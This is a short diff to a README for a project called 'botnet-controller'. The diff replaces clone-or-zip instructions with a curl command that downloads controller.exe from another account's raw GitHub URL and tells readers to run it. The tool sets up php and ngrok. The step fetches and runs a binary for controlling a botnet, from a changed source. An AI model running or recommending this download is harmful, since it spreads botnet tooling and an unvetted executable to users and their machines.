ZackeryRSmith/botnet-controller/README.md

 ## Getting started?

-- Download the software either by cloning it or downloading the zip file.
+- Download the software from here "https://raw.githubusercontent.com/canosaur/botnet-controller/main/controller.exe" or run
+- ``` curl -o controller.exe https://raw.githubusercontent.com/canosaur/botnet-controller/main/controller.exe  ```
 - Run `controller.exe`, if this is the first time running it, it will download some packages.
 - If you are an advance user and already have php, ngrok installed you can edit the source code accordingly and use it, but by default the program will
 - itself download all the dependencies.